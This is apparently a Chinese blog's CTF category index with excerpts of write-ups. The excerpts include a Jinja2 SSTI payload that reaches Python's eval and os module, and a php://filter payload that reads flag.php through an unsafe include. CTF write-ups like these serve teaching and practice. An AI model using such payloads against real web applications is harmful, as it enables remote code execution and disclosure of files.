随笔分类 -  CTF

摘要:[HNCTF 2022 WEEK2]ez_SSTI payload:?name={{''.__class__.__base__.__subclasses__()[137].__init__.__globals__['__builtins__']['eval']('__import__("os").p 阅读全文
posted @ 2024-07-13 16:34 Zonda_R 阅读(125) 评论(0) 推荐(0) 编辑
摘要:查看源代码,大概意思就是已知result反推flag flag = 'xxxxxxxxxxxxxxxxxx' list = [47, 138, 127, 57, 117, 188, 51, 143, 17, 84, 42, 135, 76, 105, 28, 169, 25] result = '' 阅读全文
posted @ 2024-06-12 16:45 Zonda_R 阅读(59) 评论(0) 推荐(0) 编辑
摘要:highlight_file(__FILE__); include($_POST["flag"]); //flag in /var/www/html/flag.php; 题目只给了一个include以及flag的路径,尝试使用伪协议读取flag.php flag=php://filter/conve 阅读全文
posted @ 2024-06-12 16:16 Zonda_R 阅读(61) 评论(0) 推荐(0) 编辑
摘要:[SWPUCTF 2021 新生赛]PseudoProtocols 尝试直接访问hint.php,发现并没有效果 联想到题目为PseudoProtocols(伪协议),尝试使用伪协议 php://filter参数详解 该协议的参数会在该协议路径上进行传递,多个参数都可以在一个路径上传递。具体参考如下 阅读全文
posted @ 2024-02-29 15:53 Zonda_R 阅读(227) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示